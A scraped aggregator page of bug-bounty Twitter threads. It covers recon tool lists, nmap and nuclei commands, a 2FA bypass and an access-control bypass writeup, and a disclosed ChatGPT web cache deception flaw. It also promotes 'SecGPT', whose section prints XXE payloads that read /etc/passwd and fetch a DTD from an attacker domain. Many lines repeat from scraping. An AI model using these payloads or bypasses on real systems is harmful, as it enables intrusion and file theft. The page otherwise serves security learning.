Discover and read the best of Twitter Threads about #BugBounty
Most recents (24)
Cybersecurity is a rapidly growing field, and the demand for qualified professionals is high. A cybersecurity certificate can help you gain the skills and knowledge you need to start a career in this in-demand field.
Here are some of the benefits of getting a cybersecurity certificate:
1. Increased job opportunities
2. Higher salaries
3. More job security
4. Personal satisfaction
5. Addition To Your Knowledge
1. Increased job opportunities
2. Higher salaries
3. More job security
4. Personal satisfaction
5. Addition To Your Knowledge
Some of the major vulnerabilities and related POC’s:
➡SQLi
➡XSS
➡SSRF
➡XXE
➡Path Traversal
➡Open Redirection
➡Account Takeover
➡Remote code execution
➡IDOR
➡CSRF
#hacking #bugbounty #bugbountytips
Are Found Below🧵(1/n)👇
➡SQLi
➡XSS
➡SSRF
➡XXE
➡Path Traversal
➡Open Redirection
➡Account Takeover
➡Remote code execution
➡IDOR
➡CSRF
#hacking #bugbounty #bugbountytips
Are Found Below🧵(1/n)👇
SQLi POC’s:
#hacking #bugbounty #bugbountytips
1. medium.com/@mahitman1/hac…
2. krevetk0.medium.com/burpsuit-sqlma…
#hacking #bugbounty #bugbountytips
1. medium.com/@mahitman1/hac…
2. krevetk0.medium.com/burpsuit-sqlma…
XSS POC’s:
#hacking #bugbounty #bugbountytips
🔗1.
medium.com/@jonathanbouma…
🔗2.
medium.com/@jonathanbouma…
🔗3.
medium.com/@jonathanbouma…
#hacking #bugbounty #bugbountytips
🔗1.
medium.com/@jonathanbouma…
🔗2.
medium.com/@jonathanbouma…
🔗3.
medium.com/@jonathanbouma…
😉You would love to grab these for yourselves won't you... 🕶️but hold on they are currently in the hands of inquisitive #hardwarehackers at to make these hardware devices be ready for future threats
⌚️Teardown has begun at #HardPwn🛩️
#hw_ioUSA2023
⌚️Teardown has begun at #HardPwn🛩️
#hw_ioUSA2023
⌚️Eyeing for that one little critical #vulnerability at #HardPwn
#hw_ioUSA2023 #hardwarehacking #bugbounty
#hw_ioUSA2023 #hardwarehacking #bugbounty
Nuclei + AI = Money 🤑
Here's how to use AI and nuclei to make money while you sleep 👇🧵
#bugbountytips #bugbounty
Here's how to use AI and nuclei to make money while you sleep 👇🧵
#bugbountytips #bugbounty
1. Run nuclei
First of all, if you can use a server or any kind of droplet (for Axiom, Hakq or Nuclei Cloud) that would be great!
Use them and run nuclei on a large number of subdomains.
See the final command in the next tweet 👇
First of all, if you can use a server or any kind of droplet (for Axiom, Hakq or Nuclei Cloud) that would be great!
Use them and run nuclei on a large number of subdomains.
See the final command in the next tweet 👇
2. Nuclei config
- max number of templates to be executed in parallel (-c)
- number of hosts to be analyzed in parallel per template (-bs)
- rate limit number (-rl)
Final command:
"nuclei -o output.txt -bs <> -c <> -rl <>"
Learn more about @pdnuclei 👇
nuclei.projectdiscovery.io/nuclei/get-sta…
- max number of templates to be executed in parallel (-c)
- number of hosts to be analyzed in parallel per template (-bs)
- rate limit number (-rl)
Final command:
"nuclei -o output.txt -bs <> -c <> -rl <>"
Learn more about @pdnuclei 👇
nuclei.projectdiscovery.io/nuclei/get-sta…
Try fuzzing HTTP method/user agents, you would be surprised how many times simply changing User-Agent to e.g. mobile specific client worked.
Play with forward/referer type of headers and their values. Try different variants, fuzz common custom headers that follow the pattern with different formats of localhost/custom IP address.
Wondering what happened this week in #BugBounty and pentesting? Procrastinating on twitter and want to pretend to be productive? Let's check out this weeks #BugBytes
PS: did you notice that the write ups and tutorials are now separated? If you're looking for more advanced security research or grow your skills!
1⃣@NahamSec talks about 2 months of bug hunting, the luck, approach and choosing a program and also burn out
Complete Bug Bounty tool List :)
dnscan github.com/rbsec/dnscan
Knockpy github.com/guelfoweb/knock
Sublist3r github.com/aboul3la/Subli…
massdns github.com/blechschmidt/m…
nmap nmap.org
masscan github.com/robertdavidgra…
#bugbounty #bugbountytips #cybersecurity #hacking
dnscan github.com/rbsec/dnscan
Knockpy github.com/guelfoweb/knock
Sublist3r github.com/aboul3la/Subli…
massdns github.com/blechschmidt/m…
nmap nmap.org
masscan github.com/robertdavidgra…
#bugbounty #bugbountytips #cybersecurity #hacking
EyeWitness github.com/ChrisTruncer/E…
DirBuster sourceforge.net/projects/dirbu…
dirsearch github.com/maurosoria/dir…
Gitrob github.com/michenriksen/g…
git-secrets github.com/awslabs/git-se…
sandcastle github.com/yasinS/sandcas…
bucket_finder digi.ninja/projects/bucke…
DirBuster sourceforge.net/projects/dirbu…
dirsearch github.com/maurosoria/dir…
Gitrob github.com/michenriksen/g…
git-secrets github.com/awslabs/git-se…
sandcastle github.com/yasinS/sandcas…
bucket_finder digi.ninja/projects/bucke…
GoogD0rker github.com/ZephrFish/Goog…
Wayback Machine web.archive.org
waybackurls gist.github.com/mhmdiaa/adf6bf…
Sn1per github.com/1N3/Sn1per/
XRay github.com/evilsocket/xray
wfuzz github.com/xmendez/wfuzz/
patator github.com/lanjelot/patat…
datasploit github.com/DataSploit/dat…
Wayback Machine web.archive.org
waybackurls gist.github.com/mhmdiaa/adf6bf…
Sn1per github.com/1N3/Sn1per/
XRay github.com/evilsocket/xray
wfuzz github.com/xmendez/wfuzz/
patator github.com/lanjelot/patat…
datasploit github.com/DataSploit/dat…
🧵NEW THREAD🧵
Here is how I was able to takeover the whole company's AWS infrastructure under 10 min after a new asset launch at @Hacker0x01 private program
Here is how I was able to takeover the whole company's AWS infrastructure under 10 min after a new asset launch at @Hacker0x01 private program
1. I was invited in the morning to a private program at H1 and the program updated the scope in the evening, So I decided to take a look to see if there is something to hack
2. I visited the main website in scope, to my surprise and thanks to @trufflesec Chrome extension Trufflehog which could be found here chrome.google.com/webstore/detai…
🧵NEW Thread🧵
Here is how I found the easiest SQLi and possible RCE in less than 30 min of recon and dorking
1. I was invited to a private program at @Hacker0x01 and the first thing I usually do is to look at the scope and see if it is a wildcard domain or just a small scope.
Here is how I found the easiest SQLi and possible RCE in less than 30 min of recon and dorking
1. I was invited to a private program at @Hacker0x01 and the first thing I usually do is to look at the scope and see if it is a wildcard domain or just a small scope.
2. Found that the program accepts all vulnerabilities related to their assets and of course third party assets are OOS
3. I used @leak_ix search engine at leakix.net and used this dork [+target_name ++plugin:"GitConfigHttpPlugin"]
Note : this is used to search for already scanned websites that have /.git exposed
Note : this is used to search for already scanned websites that have /.git exposed
ProjectDiscovery Recon Series 🔥
Your daily Sunday reading is brought to you by @pdiscoveryio with its Recon 101 Series.🧵👇
#Recon #AttackSurface #bugbounty #recontips #projectdiscovery
Your daily Sunday reading is brought to you by @pdiscoveryio with its Recon 101 Series.🧵👇
#Recon #AttackSurface #bugbounty #recontips #projectdiscovery
1 - Active and Passive Recon
Master both techniques to uncover target info stealthily.
blog.projectdiscovery.io/reconnaissance…
Master both techniques to uncover target info stealthily.
blog.projectdiscovery.io/reconnaissance…
A lesser-known yet effective way of #bugbounty hunting is called "hacktivity" hunting. It involves bypassing fixes on disclosed reports found on @Hacker0x01's hacktivity page. This approach helped me score a $5k bounty! Here's how it works.👇
#InfoSec #CyberSecurity
#InfoSec #CyberSecurity
With hacktivity hunting, the hard part - finding interesting behavior or insecure features - is already done for you. Your main role is to find a bypass.
For example, I found a bypass for a report on hackerone.com/reports/949643
#BugBountyTips
For example, I found a bypass for a report on hackerone.com/reports/949643
#BugBountyTips
The original report tried to restrict access to /admin by restricting the path in Nginx. However, I bypassed it using simple encoding - /%2561dmin. Endpoints required authentication, but I bypassed this by adding ".json" at the end.
#BugBounty #Hacking
#BugBounty #Hacking
Want to improve your network scanning skills with Nmap? 🕵️♀️💻
Check out these 5 quick tips to define targets, speed up scans, and scan with specific script categories! 🧵👇
#recon #recontips #AttackSurface #bugbounty #recontools #cybersecurity
Check out these 5 quick tips to define targets, speed up scans, and scan with specific script categories! 🧵👇
#recon #recontips #AttackSurface #bugbounty #recontools #cybersecurity
1/5 Let's start with how to define targets.
Define targets for nmap scan by specifying IP addresses, IP ranges, domain names, or using a target list file.
$ nmap <IP1> <IP2> …
$ nmap 192.168.0.1/24
$ nmap <domain name>
$ nmap -iL <target list file>
Define targets for nmap scan by specifying IP addresses, IP ranges, domain names, or using a target list file.
$ nmap <IP1> <IP2> …
$ nmap 192.168.0.1/24
$ nmap <domain name>
$ nmap -iL <target list file>
2/5 The Ippsec scan for basic coverage.
Perform a comprehensive network scan using nmap's Ippsec initial scan.
$ nmap 127.0.0.1 -sC -sV -oA initial_nmap_scan
Perform a comprehensive network scan using nmap's Ippsec initial scan.
$ nmap 127.0.0.1 -sC -sV -oA initial_nmap_scan
Two factor Authentication bypass : ⚔️
- In applications registration , it required a mobile number for compulsory 2 factor authentication.
- Captured the request for mobile number addition
POST /mobile/add
{XXNUMBERXX}
- In applications registration , it required a mobile number for compulsory 2 factor authentication.
- Captured the request for mobile number addition
POST /mobile/add
{XXNUMBERXX}
(1/n)
- Now followed the registration normally by adding a mobile number.
- Now when I login to account it required an otp to proceed.
- Used an invalid otp like 111111 and intercepted the request.
- Changed the request PATH and BODY to earlier captured request.
- Now followed the registration normally by adding a mobile number.
- Now when I login to account it required an otp to proceed.
- Used an invalid otp like 111111 and intercepted the request.
- Changed the request PATH and BODY to earlier captured request.
(2/n)
- They we’re implementing checks for all internal api endpoints before entering otp but forget to add check for mobile number addition request.
- I was able to add a new number without entering otp
- This led to 2fa bypass.
#infosec #cybersec #bugbounty
- They we’re implementing checks for all internal api endpoints before entering otp but forget to add check for mobile number addition request.
- I was able to add a new number without entering otp
- This led to 2fa bypass.
#infosec #cybersec #bugbounty
😱 I asked ChatGPT "What are some of the unpopular SQL injection areas" and this is what it replied.
🧵👇
#bugbounty #cybersecurity #infosec #sqli
🧵👇
#bugbounty #cybersecurity #infosec #sqli
1. Error messages: Sometimes error messages can reveal important information about the application's database, such as table names or column names. An attacker can use this information to craft a SQL injection attack.
2. Search fields: Search fields are often overlooked when testing for SQL injection vulnerabilities, but they can be an easy target for attackers. In un-sanitized search queries, an attacker can inject SQL code to retrieve sensitive data from the database.
40 Best PenTesting Toolkits
Information Gathering
•OSINT Framework
•Nmap
•Whois
•Recon-ng
•Wireshark
•Dnsrecon
•Google Hacking Database
•Nikto
•Dnsenum
Information Gathering
•OSINT Framework
•Nmap
•Whois
•Recon-ng
•Wireshark
•Dnsrecon
•Google Hacking Database
•Nikto
•Dnsenum
Scanning and Enumeration
•Nmap
•Nikto
•Powershell Scripts
•Openvas
•Nessus
•Sqlninja
•OWASP ZAP
•Wp-scan
•Nmap
•Nikto
•Powershell Scripts
•Openvas
•Nessus
•Sqlninja
•OWASP ZAP
•Wp-scan
Exploitation
•Metasploit
•Sqlmap
•Mitre Att&ck
•Burp Suite
•Hydra
•Netcat
•Routersploit
•Cain and Abel
•John the Ripper
•Hashcat
•Metasploit
•Sqlmap
•Mitre Att&ck
•Burp Suite
•Hydra
•Netcat
•Routersploit
•Cain and Abel
•John the Ripper
•Hashcat
☃️Bug Bounty Beginner's Roadmap☃️
Many of you have asked me how to get started at bugbounty and what are the pre-requisites to get started.
This repository contains nearly everything you need to know and can help you get started easily with a variety of resources.
#bugbounty
Many of you have asked me how to get started at bugbounty and what are the pre-requisites to get started.
This repository contains nearly everything you need to know and can help you get started easily with a variety of resources.
#bugbounty
@techhacker98 That's a wrap!
If you enjoyed this thread:
1. Follow me @thebinarybot to get quality content on cybersecurity and bug bounty hunting.
2. RT the tweet below to share this thread with your audience
If you enjoyed this thread:
1. Follow me @thebinarybot to get quality content on cybersecurity and bug bounty hunting.
2. RT the tweet below to share this thread with your audience
The team at @OpenAI just fixed a critical account takeover vulnerability I reported few hours ago affecting #ChatGPT.
It was possible to takeover someone's account, view their chat history, and access their billing information without them ever realizing it.
Breakdown below 👇
It was possible to takeover someone's account, view their chat history, and access their billing information without them ever realizing it.
Breakdown below 👇
@OpenAI The vulnerability was "Web Cache Deception" and I'll explain in details how I managed to bypass the protections in place on chat.openai.com.
It's important to note that the issue is fixed, and I received a "Kudos" email from @OpenAI's team for my responsible disclosure.
It's important to note that the issue is fixed, and I received a "Kudos" email from @OpenAI's team for my responsible disclosure.
While exploring the requests that handle ChatGPT's authentication flow I was looking for any anomaly that might expose user information.
The following GET request caught my attention:
https://chat.openai[.]com/api/auth/session
The following GET request caught my attention:
https://chat.openai[.]com/api/auth/session
Few months ago @osiryszzz and me discovered an interesting case of SQL injection on the @SynackRedTeam target which was black box testing.
During recon we noticed that there was an unrestricted file upload mechanism available to the any user. #bugbounty #bugbountytips /1
During recon we noticed that there was an unrestricted file upload mechanism available to the any user. #bugbounty #bugbountytips /1
We noticed that the target was only processing the ZIP files but where the content unzipped wasn't clear which was preventing potential RCE or file overwrite via ZIP bombing. /2
However it appears that each file entry inside the ZIP file was added to the database after unpacking, which we wanted to see if it's possible to achieve SQL injection, by simply making file name with SQL injection payload. /3
From Noob to Pentesting Clients in 2023 👇
1. Be laser focused to become l33t. Cybersecurity is a large field and you can't be an expert of everything.
2. Let's say you choose application security. Here's how I would skill up really fast.
HTTP Parameter Pollution @SecGPT has seen in its training.
1. ATO via password reset
The attacker manipulates the HTTP parameters of the password reset page to change the email address associated with the account; then use the password reset link => ATO.
The attacker manipulates the HTTP parameters of the password reset page to change the email address associated with the account; then use the password reset link => ATO.
2. Price manipulation in e-commerce platforms
The attacker manipulates the HTTP parameters of an e-commerce website to change the price of a product. The attacker can then purchase the product at a lower price than intended.
The attacker manipulates the HTTP parameters of an e-commerce website to change the price of a product. The attacker can then purchase the product at a lower price than intended.
🚀🔒Exciting news! SecGPT is now LIVE!
Trained on thousands of cybersecurity reports, SecGPT revolutionizes cybersecurity with AI-driven insights.👇
Trained on thousands of cybersecurity reports, SecGPT revolutionizes cybersecurity with AI-driven insights.👇
1. Trained on an extensive collection of cybersecurity reports, @SecGPT provides you with a deeper understanding of vulnerabilities, exploitation techniques, and emerging trends in cybersecurity.
Its knowledge increases as more reports and writeups are published.
Its knowledge increases as more reports and writeups are published.
2. Explore SecGPT's capabilities and see how it can assist you in enhancing your cybersecurity expertise.
Try it out for free at alterai.me
#ai #cybersecurity #infosec #pentesting #ethicalhacking #bugbounty #bugbountytips #secgpt
Try it out for free at alterai.me
#ai #cybersecurity #infosec #pentesting #ethicalhacking #bugbounty #bugbountytips #secgpt
Boost your pentesting and bug bounty game with SecGPT's AI insights from thousands of online security reports.
I've asked it for some XXE payloads found in the reports.
I've asked it for some XXE payloads found in the reports.
1. Basic XXE payload
`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
2. Blind XXE payload
`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
Unlocking the Secrets: Breaking Access Controls, the basics 👇
(from the AI model I'm currently training on security reports)
(from the AI model I'm currently training on security reports)
1. Direct object reference
This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
2. Horizontal privilege escalation
This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
Often times to simplify my work I build scripts.👇
I recently discovered katana by @pdiscoveryio. And I turned this:
katana -d 5 -c 50 -p 20 -ef "ttf,woff,svg,jpeg,jpg,png,ico,gif,css" -u <https://tld> -cs "regex-to-restrict-to-tld-and-subdomains"
into this:
kata <tld>
I recently discovered katana by @pdiscoveryio. And I turned this:
katana -d 5 -c 50 -p 20 -ef "ttf,woff,svg,jpeg,jpg,png,ico,gif,css" -u <https://tld> -cs "regex-to-restrict-to-tld-and-subdomains"
into this:
kata <tld>
1. The long command does the following:
-d => depth 5
-c => concurrency 50
-p => threads in parallel 20
-ef => exclude these
-u => supply the top level domain (i.e. twitter.com)
-cs => scope for this regex (limited to the tld and its subdomains)
-d => depth 5
-c => concurrency 50
-p => threads in parallel 20
-ef => exclude these
-u => supply the top level domain (i.e. twitter.com)
-cs => scope for this regex (limited to the tld and its subdomains)
2. You can download the kata bash script from my repo below. Use it as:
kata <tld>
Do me a favor and star the repo, thanks!
#pentesting #infosec #cybersecurity #ethicalhacking #bugbounty #bugbountytips
github.com/CristiVlad25/s…
kata <tld>
Do me a favor and star the repo, thanks!
#pentesting #infosec #cybersecurity #ethicalhacking #bugbounty #bugbountytips
github.com/CristiVlad25/s…
